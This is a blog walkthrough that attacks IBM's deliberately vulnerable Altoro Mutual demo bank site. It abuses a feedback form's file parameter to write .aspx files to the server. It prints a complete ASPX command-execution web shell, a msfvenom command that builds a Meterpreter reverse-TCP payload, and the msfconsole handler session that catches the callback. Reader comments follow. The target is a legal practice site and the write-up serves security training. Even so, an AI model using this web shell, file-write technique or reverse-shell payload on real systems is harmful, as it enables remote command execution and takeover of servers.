Altoro Mutual ~$ Known as “Hack me” site made by IBM.

This site got all possible vulnerabilities as: “XXS, SQL Injection, RFI/LFI” and more.

I’m going to skip “XSS” and “SQL” Injection in this Walkthrough, and proceed to “RFI/LFI” to get Shell.

 

~$ Web Shell

If we scan Altoro Mutual website with Burp Spider, we will detect that there is a “comment.aspx” page, That POST to “comments.txt” file.

Now lets navigate to “comments.txt” file: “http://demo.testfire.net/comments.txt”

Altoro Mutual Walkthrough - Get Shell

The same data that Burp Spider have poster appears on “comments.txt” file.

Lets navigate to “feedback.aspx“, and check if we can change posted data with Burp!

Altoro Mutual Walkthrough - Get Shell

I have changed the “cfile=comments.txt” to “cfile=alexander.aspx”, lets check if the file have created? Navigate to “alexander.aspx”

Altoro Mutual Walkthrough - Get Shell

Good news! Now we know that we can create .aspx file. So why not to post some .NET code in there? 🙂

Lets use ASPX webshell that already exist on your Kali machine!

The ASPX webshell located at /usr/share/webshells/aspx/cmdasp.aspx
We need to remove the “HTML, HEAD, title” tags from the code! Probably the server detect them…

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
}
string ExcuteCmd(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void cmdExe_Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>

 

Its better to paste the code inside the fields, because the code will be encoded.

Altoro Mutual Walkthrough - Get Shell

Navigate to “alexander.aspx”.
We will see Input field, this is our terminal!

Altoro Mutual Walkthrough - Get Shell

Great, We got a WebShell! 🙂

 

~$ Meterpreter Shell

We already know how to create “aspx” files with our code. So lets create one with reverse shell!

Open your terminal, and create aspx code with msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f aspx > aspxshell.aspx

Copy the code, and post a new “feedback” 🙂

Altoro Mutual Walkthrough - Get Shell

Now open “Msfconsole”, use exploit multi handler and windows meterpreter reverse tcp payload.

root@kali:~ $ msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LPORT <your port>
LPORT => <your port>
msf exploit(multi/handler) > set LHOST <your ip>
LHOST => <your ip>
msf exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on <your ip>:<your port>

Ready no get Meterpreter Shell? Just navigate to file we created: “aspxshell.aspx”

Altoro Mutual Walkthrough - Get Shell

Great, We got a Meterpreter Shell! 🙂

  • Liors CTF2-2 Walkthrough

    Walkthrough № 1: Ports found: 21/tcp open ftp FileZilla ftpd 0.9.41 beta 80/tcp open http …
  • $ Honeypot – all ports are OPEN.

    This script acts as a simple honeypot. It answers every SYN with a SYN/ACK. This will make…

Comments on Altoro Mutual – Get SHELL!

  • neha

    I have tried to change the POST data with burp from “cfile=comments.txt” to “cfile=myFile.jsp”, and then navigate the page, it returns error – Page could not be found. Any other way to get the webshell?

    • UtopiaBe

      Hello, I don’t think that the Server of “Altoro Mutual” supports JSP files, as you can see it’s ASPX (dot.net) web server, So probably the server doesn’t accepts the .JSP extension, and deletes it.
      Try to do as i did with ASPX file extension.

      • RoodyChan

        Hi,the server has updated to tomcat7 now,and it only supports JSP files,vulnerable aspx files has deleted。
        And now can you still get its webshell?
        expecting your reply.

Check Also

Protected: CHAOS Payload Generator Analysis

There is no excerpt because this is a protected post. …